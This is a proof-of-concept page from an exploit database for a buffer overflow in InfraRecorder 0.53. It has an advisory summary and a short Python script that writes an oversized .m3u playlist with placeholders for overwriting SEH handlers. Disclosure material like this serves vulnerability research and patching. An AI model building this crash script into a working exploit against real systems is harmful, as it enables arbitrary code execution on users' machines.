InfraRecorder – ‘.m3u’ File Buffer Overflow (PoC)

  • 作者: Osanda Malith Jayathissa
    日期: 2014-05-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39329/
  • source: https://www.securityfocus.com/bid/67076/info
    
    InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
    
    Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
    
    InfraRecorder 0.53 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/python
    # Exploit Title: InfraRecorder Unicode Buffer Overflow
    # Version: version 0.53
    # Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
    # Tested on: Windows XP sp2
    # Exploit Author: Osanda Malith 
    '''
    We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
    you can build a successful exploit.
    '''
    '''
    Click Edit -> Import -> import our buffer
    '''
    junk = "A"*262
    nseh = "BB"
    seh = "CC"
    junk2 = "D"*20000
    file=open("Exploit.m3u","w")
    file.write(junk)
    file.close()
    #EOF